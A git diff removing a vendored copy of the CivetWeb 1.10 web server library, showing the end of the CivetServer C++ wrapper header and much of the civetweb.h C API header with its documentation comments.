-	 *
-	 * Adds a URI authorization handler.  If there is existing URI authorization
-	 * handler, it will be replaced with this one.
-	 *
-	 * URI's are ordered and prefix (REST) URI's are supported.
-	 *
-	 * @param uri - URI to match.
-	 * @param handler - authorization handler instance to use.
-	 */
-	void addAuthHandler(const std::string &uri, CivetAuthHandler *handler);
-
-	void
-	addAuthHandler(const std::string &uri, CivetAuthHandler &handler)
-	{
-		addAuthHandler(uri, &handler);
-	}
-
-	/**
-	 * removeAuthHandler(const std::string &)
-	 *
-	 * Removes an authorization handler.
-	 *
-	 * @param uri - the exact URL used in addAuthHandler().
-	 */
-	void removeAuthHandler(const std::string &uri);
-
-	/**
-	 * getListeningPorts()
-	 *
-	 * Returns a list of ports that are listening
-	 *
-	 * @return A vector of ports
-	 */
-
-	std::vector<int> getListeningPorts();
-
-	/**
-	 * getCookie(struct mg_connection *conn, const std::string &cookieName,
-	 *std::string &cookieValue)
-	 *
-	 * Puts the cookie value string that matches the cookie name in the
-	 *cookieValue destinaton string.
-	 *
-	 * @param conn - the connection information
-	 * @param cookieName - cookie name to get the value from
-	 * @param cookieValue - cookie value is returned using thiis reference
-	 * @returns the size of the cookie value string read.
-	*/
-	static int getCookie(struct mg_connection *conn,
-	                     const std::string &cookieName,
-	                     std::string &cookieValue);
-
-	/**
-	 * getHeader(struct mg_connection *conn, const std::string &headerName)
-	 * @param conn - the connection information
-	 * @param headerName - header name to get the value from
-	 * @returns a char array whcih contains the header value as string
-	*/
-	static const char *getHeader(struct mg_connection *conn,
-	                             const std::string &headerName);
-
-	/**
-	 * getParam(struct mg_connection *conn, const char *, std::string &, size_t)
-	 *
-	 * Returns a query paramter contained in the supplied buffer.  The
-	 * occurance value is a zero-based index of a particular key name.  This
-	 * should not be confused with the index over all of the keys.  Note that
-	 *this
-	 * function assumes that parameters are sent as text in http query string
-	 * format, which is the default for web forms. This function will work for
-	 * html forms with method="GET" and method="POST" attributes. In other
-	 *cases,
-	 * you may use a getParam version that directly takes the data instead of
-	 *the
-	 * connection as a first argument.
-	 *
-	 * @param conn - parameters are read from the data sent through this
-	 *connection
-	 * @param name - the key to search for
-	 * @param dst - the destination string
-	 * @param occurrence - the occurrence of the selected name in the query (0
-	 *based).
-	 * @return true if key was found
-	 */
-	static bool getParam(struct mg_connection *conn,
-	                     const char *name,
-	                     std::string &dst,
-	                     size_t occurrence = 0);
-
-	/**
-	 * getParam(const std::string &, const char *, std::string &, size_t)
-	 *
-	 * Returns a query paramter contained in the supplied buffer.  The
-	 * occurance value is a zero-based index of a particular key name.  This
-	 * should not be confused with the index over all of the keys.
-	 *
-	 * @param data - the query string (text)
-	 * @param name - the key to search for
-	 * @param dst - the destination string
-	 * @param occurrence - the occurrence of the selected name in the query (0
-	 *based).
-	 * @return true if key was found
-	 */
-	static bool
-	getParam(const std::string &data,
-	         const char *name,
-	         std::string &dst,
-	         size_t occurrence = 0)
-	{
-		return getParam(data.c_str(), data.length(), name, dst, occurrence);
-	}
-
-	/**
-	 * getParam(const char *, size_t, const char *, std::string &, size_t)
-	 *
-	 * Returns a query paramter contained in the supplied buffer.  The
-	 * occurance value is a zero-based index of a particular key name.  This
-	 * should not be confused with the index over all of the keys.
-	 *
-	 * @param data the - query string (text)
-	 * @param data_len - length of the query string
-	 * @param name - the key to search for
-	 * @param dst - the destination string
-	 * @param occurrence - the occurrence of the selected name in the query (0
-	 *based).
-	 * @return true if key was found
-	 */
-	static bool getParam(const char *data,
-	                     size_t data_len,
-	                     const char *name,
-	                     std::string &dst,
-	                     size_t occurrence = 0);
-
-	/**
-	 * urlDecode(const std::string &, std::string &, bool)
-	 *
-	 * @param src - string to be decoded
-	 * @param dst - destination string
-	 * @param is_form_url_encoded - true if form url encoded
-	 *       form-url-encoded data differs from URI encoding in a way that it
-	 *       uses '+' as character for space, see RFC 1866 section 8.2.1
-	 *       http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt
-	 */
-	static void
-	urlDecode(const std::string &src,
-	          std::string &dst,
-	          bool is_form_url_encoded = true)
-	{
-		urlDecode(src.c_str(), src.length(), dst, is_form_url_encoded);
-	}
-
-	/**
-	 * urlDecode(const char *, size_t, std::string &, bool)
-	 *
-	 * @param src - buffer to be decoded
-	 * @param src_len - length of buffer to be decoded
-	 * @param dst - destination string
-	 * @param is_form_url_encoded - true if form url encoded
-	 *       form-url-encoded data differs from URI encoding in a way that it
-	 *       uses '+' as character for space, see RFC 1866 section 8.2.1
-	 *       http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt
-	 */
-	static void urlDecode(const char *src,
-	                      size_t src_len,
-	                      std::string &dst,
-	                      bool is_form_url_encoded = true);
-
-	/**
-	 * urlDecode(const char *, std::string &, bool)
-	 *
-	 * @param src - buffer to be decoded (0 terminated)
-	 * @param dst - destination string
-	 * @param is_form_url_encoded true - if form url encoded
-	 *       form-url-encoded data differs from URI encoding in a way that it
-	 *       uses '+' as character for space, see RFC 1866 section 8.2.1
-	 *       http://ftp.ics.uci.edu/pub/ietf/html/rfc1866.txt
-	 */
-	static void urlDecode(const char *src,
-	                      std::string &dst,
-	                      bool is_form_url_encoded = true);
-
-	/**
-	 * urlEncode(const std::string &, std::string &, bool)
-	 *
-	 * @param src - buffer to be encoded
-	 * @param dst - destination string
-	 * @param append - true if string should not be cleared before encoding.
-	 */
-	static void
-	urlEncode(const std::string &src, std::string &dst, bool append = false)
-	{
-		urlEncode(src.c_str(), src.length(), dst, append);
-	}
-
-	/**
-	 * urlEncode(const char *, size_t, std::string &, bool)
-	 *
-	 * @param src - buffer to be encoded (0 terminated)
-	 * @param dst - destination string
-	 * @param append - true if string should not be cleared before encoding.
-	 */
-	static void
-	urlEncode(const char *src, std::string &dst, bool append = false);
-
-	/**
-	 * urlEncode(const char *, size_t, std::string &, bool)
-	 *
-	 * @param src - buffer to be encoded
-	 * @param src_len - length of buffer to be decoded
-	 * @param dst - destination string
-	 * @param append - true if string should not be cleared before encoding.
-	 */
-	static void urlEncode(const char *src,
-	                      size_t src_len,
-	                      std::string &dst,
-	                      bool append = false);
-
-	// generic user context which can be set/read,
-	// the server does nothing with this apart from keep it.
-	const void *
-	getUserContext() const
-	{
-		return UserContext;
-	}
-
-  protected:
-	class CivetConnection
-	{
-	  public:
-		char *postData;
-		unsigned long postDataLen;
-
-		CivetConnection();
-		~CivetConnection();
-	};
-
-	struct mg_context *context;
-	std::map<struct mg_connection *, class CivetConnection> connections;
-
-	// generic user context which can be set/read,
-	// the server does nothing with this apart from keep it.
-	const void *UserContext;
-
-  private:
-	/**
-	 * requestHandler(struct mg_connection *, void *cbdata)
-	 *
-	 * Handles the incomming request.
-	 *
-	 * @param conn - the connection information
-	 * @param cbdata - pointer to the CivetHandler instance.
-	 * @returns 0 if implemented, false otherwise
-	 */
-	static int requestHandler(struct mg_connection *conn, void *cbdata);
-
-	static int webSocketConnectionHandler(const struct mg_connection *conn,
-	                                      void *cbdata);
-	static void webSocketReadyHandler(struct mg_connection *conn, void *cbdata);
-	static int webSocketDataHandler(struct mg_connection *conn,
-	                                int bits,
-	                                char *data,
-	                                size_t data_len,
-	                                void *cbdata);
-	static void webSocketCloseHandler(const struct mg_connection *conn,
-	                                  void *cbdata);
-	/**
-	 * authHandler(struct mg_connection *, void *cbdata)
-	 *
-	 * Handles the authorization requests.
-	 *
-	 * @param conn - the connection information
-	 * @param cbdata - pointer to the CivetAuthHandler instance.
-	 * @returns 1 if authorized, 0 otherwise
-	 */
-	static int authHandler(struct mg_connection *conn, void *cbdata);
-
-	/**
-	 * closeHandler(struct mg_connection *)
-	 *
-	 * Handles closing a request (internal handler)
-	 *
-	 * @param conn - the connection information
-	 */
-	static void closeHandler(const struct mg_connection *conn);
-
-	/**
-	 * Stores the user provided close handler
-	 */
-	void (*userCloseHandler)(const struct mg_connection *conn);
-};
-
-#endif /*  __cplusplus */
-#endif /* _CIVETWEB_SERVER_H_ */
diff --git a/thirdparty/civetweb-1.10/include/civetweb.h b/thirdparty/civetweb-1.10/include/civetweb.h
deleted file mode 100644
index b0f5ee7..0000000
--- a/thirdparty/civetweb-1.10/include/civetweb.h
+++ /dev/null
@@ -1,1367 +0,0 @@
-/* Copyright (c) 2013-2017 the Civetweb developers
- * Copyright (c) 2004-2013 Sergey Lyubka
- *
- * Permission is hereby granted, free of charge, to any person obtaining a copy
- * of this software and associated documentation files (the "Software"), to deal
- * in the Software without restriction, including without limitation the rights
- * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
- * copies of the Software, and to permit persons to whom the Software is
- * furnished to do so, subject to the following conditions:
- *
- * The above copyright notice and this permission notice shall be included in
- * all copies or substantial portions of the Software.
- *
- * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
- * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
- * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
- * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
- * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
- * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
- * THE SOFTWARE.
- */
-
-#ifndef CIVETWEB_HEADER_INCLUDED
-#define CIVETWEB_HEADER_INCLUDED
-
-#define CIVETWEB_VERSION "1.10"
-#define CIVETWEB_VERSION_MAJOR (1)
-#define CIVETWEB_VERSION_MINOR (10)
-#define CIVETWEB_VERSION_PATCH (0)
-#define CIVETWEB_VERSION_RELEASED
-
-#ifndef CIVETWEB_API
-#if defined(_WIN32)
-#if defined(CIVETWEB_DLL_EXPORTS)
-#define CIVETWEB_API __declspec(dllexport)
-#elif defined(CIVETWEB_DLL_IMPORTS)
-#define CIVETWEB_API __declspec(dllimport)
-#else
-#define CIVETWEB_API
-#endif
-#elif __GNUC__ >= 4
-#define CIVETWEB_API __attribute__((visibility("default")))
-#else
-#define CIVETWEB_API
-#endif
-#endif
-
-#include <stdio.h>
-#include <stddef.h>
-
-#ifdef __cplusplus
-extern "C" {
-#endif /* __cplusplus */
-
-
-/* Initialize this library. This should be called once before any other
- * function from this library. This function is not guaranteed to be
- * thread safe.
- * Parameters:
- *   features: bit mask for features to be initialized.
- * Return value:
- *   initialized features
- *   0: error
- */
-CIVETWEB_API unsigned mg_init_library(unsigned features);
-
-
-/* Un-initialize this library.
- * Return value:
- *   0: error
- */
-CIVETWEB_API unsigned mg_exit_library(void);
-
-
-struct mg_context;    /* Handle for the HTTP service itself */
-struct mg_connection; /* Handle for the individual connection */
-
-
-/* Maximum number of headers */
-#define MG_MAX_HEADERS (64)
-
-struct mg_header {
-	const char *name;  /* HTTP header name */
-	const char *value; /* HTTP header value */
-};
-
-
-/* This structure contains information about the HTTP request. */
-struct mg_request_info {
-	const char *request_method; /* "GET", "POST", etc */
-	const char *request_uri;    /* URL-decoded URI (absolute or relative,
-	                             * as in the request) */
-	const char *local_uri;      /* URL-decoded URI (relative). Can be NULL
-	                             * if the request_uri does not address a
-	                             * resource at the server host. */
-#if defined(MG_LEGACY_INTERFACE)
-	const char *uri; /* Deprecated: use local_uri instead */
-#endif
-	const char *http_version; /* E.g. "1.0", "1.1" */
-	const char *query_string; /* URL part after '?', not including '?', or
-	                             NULL */
-	const char *remote_user;  /* Authenticated user, or NULL if no auth
-	                             used */
-	char remote_addr[48];     /* Client's IP address as a string. */
-
-#if defined(MG_LEGACY_INTERFACE)
-	long remote_ip; /* Client's IP address. Deprecated: use remote_addr instead
-	                   */
-#endif
-
-	long long content_length; /* Length (in bytes) of the request body,
-	                             can be -1 if no length was given. */
-	int remote_port;          /* Client's port */
-	int is_ssl;               /* 1 if SSL-ed, 0 if not */
-	void *user_data;          /* User data pointer passed to mg_start() */
-	void *conn_data;          /* Connection-specific user data */
-
-	int num_headers; /* Number of HTTP headers */
-	struct mg_header
-	    http_headers[MG_MAX_HEADERS]; /* Allocate maximum headers */
-
-	struct mg_client_cert *client_cert; /* Client certificate information */
-
-	const char *acceptedWebSocketSubprotocol; /* websocket subprotocol,
-	                                           * accepted during handshake */
-};
-
-
-/* This structure contains information about the HTTP request. */
-/* This structure may be extended in future versions. */
-struct mg_response_info {
-	int status_code;          /* E.g. 200 */
-	const char *status_text;  /* E.g. "OK" */
-	const char *http_version; /* E.g. "1.0", "1.1" */
-
-	long long content_length; /* Length (in bytes) of the request body,
-	                             can be -1 if no length was given. */
-
-	int num_headers; /* Number of HTTP headers */
-	struct mg_header
-	    http_headers[MG_MAX_HEADERS]; /* Allocate maximum headers */
-};
-
-
-/* Client certificate information (part of mg_request_info) */
-/* New nomenclature. */
-struct mg_client_cert {
-	const char *subject;
-	const char *issuer;
-	const char *serial;
-	const char *finger;
-};
-
-/* Old nomenclature. */
-struct client_cert {
-	const char *subject;
-	const char *issuer;
-	const char *serial;
-	const char *finger;
-};
-
-
-/* This structure needs to be passed to mg_start(), to let civetweb know
-   which callbacks to invoke. For a detailed description, see
-   https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md */
-struct mg_callbacks {
-	/* Called when civetweb has received new HTTP request.
-	   If the callback returns one, it must process the request
-	   by sending valid HTTP headers and a body. Civetweb will not do
-	   any further processing. Otherwise it must return zero.
-	   Note that since V1.7 the "begin_request" function is called
-	   before an authorization check. If an authorization check is
-	   required, use a request_handler instead.
-	   Return value:
-	     0: civetweb will process the request itself. In this case,
-	        the callback must not send any data to the client.
-	     1-999: callback already processed the request. Civetweb will
-	            not send any data after the callback returned. The
-	            return code is stored as a HTTP status code for the
-	            access log. */
-	int (*begin_request)(struct mg_connection *);
-
-	/* Called when civetweb has finished processing request. */
-	void (*end_request)(const struct mg_connection *, int reply_status_code);
-
-	/* Called when civetweb is about to log a message. If callback returns
-	   non-zero, civetweb does not log anything. */
-	int (*log_message)(const struct mg_connection *, const char *message);
-
-	/* Called when civetweb is about to log access. If callback returns
-	   non-zero, civetweb does not log anything. */
-	int (*log_access)(const struct mg_connection *, const char *message);
-
-	/* Called when civetweb initializes SSL library.
-	   Parameters:
-	     user_data: parameter user_data passed when starting the server.
-	   Return value:
-	     0: civetweb will set up the SSL certificate.
-	     1: civetweb assumes the callback already set up the certificate.
-	    -1: initializing ssl fails. */
-	int (*init_ssl)(void *ssl_context, void *user_data);
-
-#if defined(MG_LEGACY_INTERFACE)
-	/* Called when websocket request is received, before websocket handshake.
-	   Return value:
-	     0: civetweb proceeds with websocket handshake.
-	     1: connection is closed immediately.
-	   This callback is deprecated: Use mg_set_websocket_handler instead. */
-	int (*websocket_connect)(const struct mg_connection *);
-
-	/* Called when websocket handshake is successfully completed, and
-	   connection is ready for data exchange.
-	   This callback is deprecated: Use mg_set_websocket_handler instead. */
-	void (*websocket_ready)(struct mg_connection *);
-
-	/* Called when data frame has been received from the client.
-	   Parameters:
-	     bits: first byte of the websocket frame, see websocket RFC at
-	           http://tools.ietf.org/html/rfc6455, section 5.2
-	     data, data_len: payload, with mask (if any) already applied.
-	   Return value:
-	     1: keep this websocket connection open.
-	     0: close this websocket connection.
-	   This callback is deprecated: Use mg_set_websocket_handler instead. */
-	int (*websocket_data)(struct mg_connection *,
-	                      int bits,
-	                      char *data,
-	                      size_t data_len);
-#endif /* MG_LEGACY_INTERFACE */
-
-	/* Called when civetweb is closing a connection.  The per-context mutex is
-	   locked when this is invoked.
-
-	   Websockets:
-	   Before mg_set_websocket_handler has been added, it was primarily useful
-	   for noting when a websocket is closing, and used to remove it from any
-	   application-maintained list of clients.
-	   Using this callback for websocket connections is deprecated: Use
-	   mg_set_websocket_handler instead.
-
-	   Connection specific data:
-	   If memory has been allocated for the connection specific user data
-	   (mg_request_info->conn_data, mg_get_user_connection_data),
-	   this is the last chance to free it.
-	*/
-	void (*connection_close)(const struct mg_connection *);
-
-#if defined(MG_USE_OPEN_FILE)
-	/* Note: The "file in memory" feature is a deletion candidate, since
-	 * it complicates the code, and does not add any value compared to
-	 * "mg_add_request_handler".
-	 * See this discussion thread:
-	 * https://groups.google.com/forum/#!topic/civetweb/h9HT4CmeYqI
-	 * If you disagree, if there is any situation this is indeed useful
-	 * and cannot trivially be replaced by another existing feature,
-	 * please contribute to this discussion during the next 3 month
-	 * (till end of April 2017), otherwise this feature might be dropped
-	 * in future releases. */
-
-	/* Called when civetweb tries to open a file. Used to intercept file open
-	   calls, and serve file data from memory instead.
-	   Parameters:
-	      path:     Full path to the file to open.
-	      data_len: Placeholder for the file size, if file is served from
-	                memory.
-	   Return value:
-	     NULL: do not serve file from memory, proceed with normal file open.
-	     non-NULL: pointer to the file contents in memory. data_len must be
-	       initialized with the size of the memory block. */
-	const char *(*open_file)(const struct mg_connection *,
-	                         const char *path,
-	                         size_t *data_len);
-#endif
-
-	/* Called when civetweb is about to serve Lua server page, if
-	   Lua support is enabled.
-	   Parameters:
-	     lua_context: "lua_State *" pointer. */
-	void (*init_lua)(const struct mg_connection *, void *lua_context);
-
-#if defined(MG_LEGACY_INTERFACE)
-	/* Called when civetweb has uploaded a file to a temporary directory as a
-	   result of mg_upload() call.
-	   Note that mg_upload is deprecated. Use mg_handle_form_request instead.
-	   Parameters:
-	     file_name: full path name to the uploaded file. */
-	void (*upload)(struct mg_connection *, const char *file_name);
-#endif
-
-	/* Called when civetweb is about to send HTTP error to the client.
-	   Implementing this callback allows to create custom error pages.
-	   Parameters:
-	     status: HTTP error status code.
-	   Return value:
-	     1: run civetweb error handler.
-	     0: callback already handled the error. */
-	int (*http_error)(struct mg_connection *, int status);
-
-	/* Called after civetweb context has been created, before requests
-	   are processed.
-	   Parameters:
-	     ctx: context handle */
-	void (*init_context)(const struct mg_context *ctx);
-
-	/* Called when a new worker thread is initialized.
-	   Parameters:
-	     ctx: context handle
-	     thread_type:
-	       0 indicates the master thread
-	       1 indicates a worker thread handling client connections
-	       2 indicates an internal helper thread (timer thread)
-	       */
-	void (*init_thread)(const struct mg_context *ctx, int thread_type);
-
-	/* Called when civetweb context is deleted.
-	   Parameters:
-	     ctx: context handle */
-	void (*exit_context)(const struct mg_context *ctx);
-
-	/* Called when initializing a new connection object.
-	 * Can be used to initialize the connection specific user data
-	 * (mg_request_info->conn_data, mg_get_user_connection_data).
-	 * When the callback is called, it is not yet known if a
-	 * valid HTTP(S) request will be made.
-	 * Parameters:
-	 *   conn: not yet fully initialized connection object
-	 *   conn_data: output parameter, set to initialize the
-	 *              connection specific user data
-	 * Return value:
-	 *   must be 0
-	 *   Otherwise, the result is undefined
-	 */
-	int (*init_connection)(const struct mg_connection *conn, void **conn_data);
-};
-
-
-/* Start web server.
-
-   Parameters:
-     callbacks: mg_callbacks structure with user-defined callbacks.
-     options: NULL terminated list of option_name, option_value pairs that
-              specify Civetweb configuration parameters.
-
-   Side-effects: on UNIX, ignores SIGCHLD and SIGPIPE signals. If custom
-      processing is required for these, signal handlers must be set up
-      after calling mg_start().
-
-
-   Example:
-     const char *options[] = {
-       "document_root", "/var/www",
-       "listening_ports", "80,443s",
-       NULL
-     };
-     struct mg_context *ctx = mg_start(&my_func, NULL, options);
-
-   Refer to https://github.com/civetweb/civetweb/blob/master/docs/UserManual.md
-   for the list of valid option and their possible values.
-
-   Return:
-     web server context, or NULL on error. */
-CIVETWEB_API struct mg_context *mg_start(const struct mg_callbacks *callbacks,
-                                         void *user_data,
-                                         const char **configuration_options);
-
-
-/* Stop the web server.
-
-   Must be called last, when an application wants to stop the web server and
-   release all associated resources. This function blocks until all Civetweb
-   threads are stopped. Context pointer becomes invalid. */
-CIVETWEB_API void mg_stop(struct mg_context *);
-
-
-/* mg_request_handler
-
-   Called when a new request comes in.  This callback is URI based
-   and configured with mg_set_request_handler().
-
-   Parameters:
-      conn: current connection information.
-      cbdata: the callback data configured with mg_set_request_handler().
-   Returns:
-      0: the handler could not handle the request, so fall through.
-      1 - 999: the handler processed the request. The return code is
-               stored as a HTTP status code for the access log. */
-typedef int (*mg_request_handler)(struct mg_connection *conn, void *cbdata);
-
-
-/* mg_set_request_handler
-
-   Sets or removes a URI mapping for a request handler.
-   This function uses mg_lock_context internally.
-
-   URI's are ordered and prefixed URI's are supported. For example,
-   consider two URIs: /a/b and /a
-           /a   matches /a
-           /a/b matches /a/b
-           /a/c matches /a
-
-   Parameters:
-      ctx: server context
-      uri: the URI (exact or pattern) for the handler
-      handler: the callback handler to use when the URI is requested.
-               If NULL, an already registered handler for this URI will
-               be removed.
-               The URI used to remove a handler must match exactly the
-               one used to register it (not only a pattern match).
-      cbdata: the callback data to give to the handler when it is called. */
-CIVETWEB_API void mg_set_request_handler(struct mg_context *ctx,
-                                         const char *uri,
-                                         mg_request_handler handler,
-                                         void *cbdata);
-
-
-/* Callback types for websocket handlers in C/C++.
-
-   mg_websocket_connect_handler
-       Is called when the client intends to establish a websocket connection,
-       before websocket handshake.
-       Return value:
-         0: civetweb proceeds with websocket handshake.
-         1: connection is closed immediately.
-
-   mg_websocket_ready_handler
-       Is called when websocket handshake is successfully completed, and
-       connection is ready for data exchange.
-
-   mg_websocket_data_handler
-       Is called when a data frame has been received from the client.
-       Parameters:
-         bits: first byte of the websocket frame, see websocket RFC at
-               http://tools.ietf.org/html/rfc6455, section 5.2
-         data, data_len: payload, with mask (if any) already applied.
-       Return value:
-         1: keep this websocket connection open.
-         0: close this websocket connection.
-
-   mg_connection_close_handler
-       Is called, when the connection is closed.*/
-typedef int (*mg_websocket_connect_handler)(const struct mg_connection *,
-                                            void *);
-typedef void (*mg_websocket_ready_handler)(struct mg_connection *, void *);
-typedef int (*mg_websocket_data_handler)(struct mg_connection *,
-                                         int,
-                                         char *,
-                                         size_t,
-                                         void *);
-typedef void (*mg_websocket_close_handler)(const struct mg_connection *,
-                                           void *);
-
-/* struct mg_websocket_subprotocols
- *
- * List of accepted subprotocols
- */
-struct mg_websocket_subprotocols {
-	int nb_subprotocols;
-	char **subprotocols;
-};
-
-/* mg_set_websocket_handler
-
-   Set or remove handler functions for websocket connections.
-   This function works similar to mg_set_request_handler - see there. */
-CIVETWEB_API void
-mg_set_websocket_handler(struct mg_context *ctx,
-                         const char *uri,
-                         mg_websocket_connect_handler connect_handler,
-                         mg_websocket_ready_handler ready_handler,
-                         mg_websocket_data_handler data_handler,
-                         mg_websocket_close_handler close_handler,
-                         void *cbdata);
-
-/* mg_set_websocket_handler
-
-   Set or remove handler functions for websocket connections.
-   This function works similar to mg_set_request_handler - see there. */
-CIVETWEB_API void mg_set_websocket_handler_with_subprotocols(
-    struct mg_context *ctx,
-    const char *uri,
-    struct mg_websocket_subprotocols *subprotocols,
-    mg_websocket_connect_handler connect_handler,
-    mg_websocket_ready_handler ready_handler,
-    mg_websocket_data_handler data_handler,
-    mg_websocket_close_handler close_handler,
-    void *cbdata);
-
-
-/* mg_authorization_handler
-
-   Callback function definition for mg_set_auth_handler
-
-   Parameters:
-      conn: current connection information.
-      cbdata: the callback data configured with mg_set_request_handler().
-   Returns:
-      0: access denied
-      1: access granted
- */
-typedef int (*mg_authorization_handler)(struct mg_connection *conn,
-                                        void *cbdata);
-
-
-/* mg_set_auth_handler
-
-   Sets or removes a URI mapping for an authorization handler.
-   This function works similar to mg_set_request_handler - see there. */
-CIVETWEB_API void mg_set_auth_handler(struct mg_context *ctx,
-                                      const char *uri,
-                                      mg_authorization_handler handler,
-                                      void *cbdata);
-
-
-/* Get the value of particular configuration parameter.
-   The value returned is read-only. Civetweb does not allow changing
-   configuration at run time.
-   If given parameter name is not valid, NULL is returned. For valid
-   names, return value is guaranteed to be non-NULL. If parameter is not
-   set, zero-length string is returned. */
-CIVETWEB_API const char *mg_get_option(const struct mg_context *ctx,
-                                       const char *name);
-
-
-/* Get context from connection. */
-CIVETWEB_API struct mg_context *
-mg_get_context(const struct mg_connection *conn);
-
-
-/* Get user data passed to mg_start from context. */
-CIVETWEB_API void *mg_get_user_data(const struct mg_context *ctx);
-
-
-/* Set user data for the current connection. */
-CIVETWEB_API void mg_set_user_connection_data(struct mg_connection *conn,
-                                              void *data);
-
-
-/* Get user data set for the current connection. */
-CIVETWEB_API void *
-mg_get_user_connection_data(const struct mg_connection *conn);
-
-
-/* Get a formatted link corresponding to the current request
-
-   Parameters:
-      conn: current connection information.
-      buf: string buffer (out)
-      buflen: length of the string buffer
-   Returns:
-      <0: error
-      >=0: ok */
-CIVETWEB_API int
-mg_get_request_link(const struct mg_connection *conn, char *buf, size_t buflen);
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* Return array of strings that represent valid configuration options.
-   For each option, option name and default value is returned, i.e. the
-   number of entries in the array equals to number_of_options x 2.
-   Array is NULL terminated. */
-/* Deprecated: Use mg_get_valid_options instead. */
-CIVETWEB_API const char **mg_get_valid_option_names(void);
-#endif
-
-
-struct mg_option {
-	const char *name;
-	int type;
-	const char *default_value;
-};
-
-/* Old nomenclature */
-enum {
-	CONFIG_TYPE_UNKNOWN = 0x0,
-	CONFIG_TYPE_NUMBER = 0x1,
-	CONFIG_TYPE_STRING = 0x2,
-	CONFIG_TYPE_FILE = 0x3,
-	CONFIG_TYPE_DIRECTORY = 0x4,
-	CONFIG_TYPE_BOOLEAN = 0x5,
-	CONFIG_TYPE_EXT_PATTERN = 0x6,
-	CONFIG_TYPE_STRING_LIST = 0x7,
-	CONFIG_TYPE_STRING_MULTILINE = 0x8
-};
-
-/* New nomenclature */
-enum {
-	MG_CONFIG_TYPE_UNKNOWN = 0x0,
-	MG_CONFIG_TYPE_NUMBER = 0x1,
-	MG_CONFIG_TYPE_STRING = 0x2,
-	MG_CONFIG_TYPE_FILE = 0x3,
-	MG_CONFIG_TYPE_DIRECTORY = 0x4,
-	MG_CONFIG_TYPE_BOOLEAN = 0x5,
-	MG_CONFIG_TYPE_EXT_PATTERN = 0x6,
-	MG_CONFIG_TYPE_STRING_LIST = 0x7,
-	MG_CONFIG_TYPE_STRING_MULTILINE = 0x8
-};
-
-/* Return array of struct mg_option, representing all valid configuration
-   options of civetweb.c.
-   The array is terminated by a NULL name option. */
-CIVETWEB_API const struct mg_option *mg_get_valid_options(void);
-
-
-struct mg_server_ports {
-	int protocol;    /* 1 = IPv4, 2 = IPv6, 3 = both */
-	int port;        /* port number */
-	int is_ssl;      /* https port: 0 = no, 1 = yes */
-	int is_redirect; /* redirect all requests: 0 = no, 1 = yes */
-	int _reserved1;
-	int _reserved2;
-	int _reserved3;
-	int _reserved4;
-};
-
-
-/* Get the list of ports that civetweb is listening on.
-   The parameter size is the size of the ports array in elements.
-   The caller is responsibility to allocate the required memory.
-   This function returns the number of struct mg_server_ports elements
-   filled in, or <0 in case of an error. */
-CIVETWEB_API int mg_get_server_ports(const struct mg_context *ctx,
-                                     int size,
-                                     struct mg_server_ports *ports);
-
-
-#if defined(MG_LEGACY_INTERFACE)
-/* Deprecated: Use mg_get_server_ports instead. */
-CIVETWEB_API size_t
-mg_get_ports(const struct mg_context *ctx, size_t size, int *ports, int *ssl);
-#endif
-
-
-/* Add, edit or delete the entry in the passwords file.
- *
- * This function allows an application to manipulate .htpasswd files on the
- * fly by adding, deleting and changing user records. This is one of the
- * several ways of implementing authentication on the server side. For another,
- * cookie-based way please refer to the examples/chat in the source tree.
- *
- * Parameter:
- *   passwords_file_name: Path and name of a file storing multiple passwords
- *   realm: HTTP authentication realm (authentication domain) name
- *   user: User name
- *   password:
- *     If password is not NULL, entry modified or added.
- *     If password is NULL, entry is deleted.
- *
- *  Return:
- *    1 on success, 0 on error.
- */
-CIVETWEB_API int mg_modify_passwords_file(const char *passwords_file_name,
-                                          const char *realm,
-                                          const char *user,
-                                          const char *password);
-
-
-/* Return information associated with the request.
- * Use this function to implement a server and get data about a request
- * from a HTTP/HTTPS client.
- * Note: Before CivetWeb 1.10, this function could be used to read
- * a response from a server, when implementing a client, although the
- * values were never returned in appropriate mg_request_info elements.
- * It is strongly advised to use mg_get_response_info for clients.
- */
-CIVETWEB_API const struct mg_request_info *
-mg_get_request_info(const struct mg_connection *);
-
-
-/* Return information associated with a HTTP/HTTPS response.
- * Use this function in a client, to check the response from
- * the server. */
-CIVETWEB_API const struct mg_response_info *
-mg_get_response_info(const struct mg_connection *);
-
-
-/* Send data to the client.
-   Return:
-    0   when the connection has been closed
-    -1  on error
-    >0  number of bytes written on success */
-CIVETWEB_API int mg_write(struct mg_connection *, const void *buf, size_t len);
-
-
-/* Send data to a websocket client wrapped in a websocket frame.  Uses
-   mg_lock_connection to ensure that the transmission is not interrupted,
-   i.e., when the application is proactively communicating and responding to
-   a request simultaneously.
-
-   Send data to a websocket client wrapped in a websocket frame.
-   This function is available when civetweb is compiled with -DUSE_WEBSOCKET
-
-   Return:
-    0   when the connection has been closed
-    -1  on error
-    >0  number of bytes written on success */
-CIVETWEB_API int mg_websocket_write(struct mg_connection *conn,
-                                    int opcode,
-                                    const char *data,
-                                    size_t data_len);
-
-
-/* Send data to a websocket server wrapped in a masked websocket frame.  Uses
-   mg_lock_connection to ensure that the transmission is not interrupted,
-   i.e., when the application is proactively communicating and responding to
-   a request simultaneously.
-
-   Send data to a websocket server wrapped in a masked websocket frame.
-   This function is available when civetweb is compiled with -DUSE_WEBSOCKET
-
-   Return:
-    0   when the connection has been closed
-    -1  on error
-    >0  number of bytes written on success */
-CIVETWEB_API int mg_websocket_client_write(struct mg_connection *conn,
-                                           int opcode,
-                                           const char *data,
-                                           size_t data_len);
-
-
-/* Blocks until unique access is obtained to this connection. Intended for use
-   with websockets only.
-   Invoke this before mg_write or mg_printf when communicating with a
-   websocket if your code has server-initiated communication as well as
-   communication in direct response to a message. */
-CIVETWEB_API void mg_lock_connection(struct mg_connection *conn);
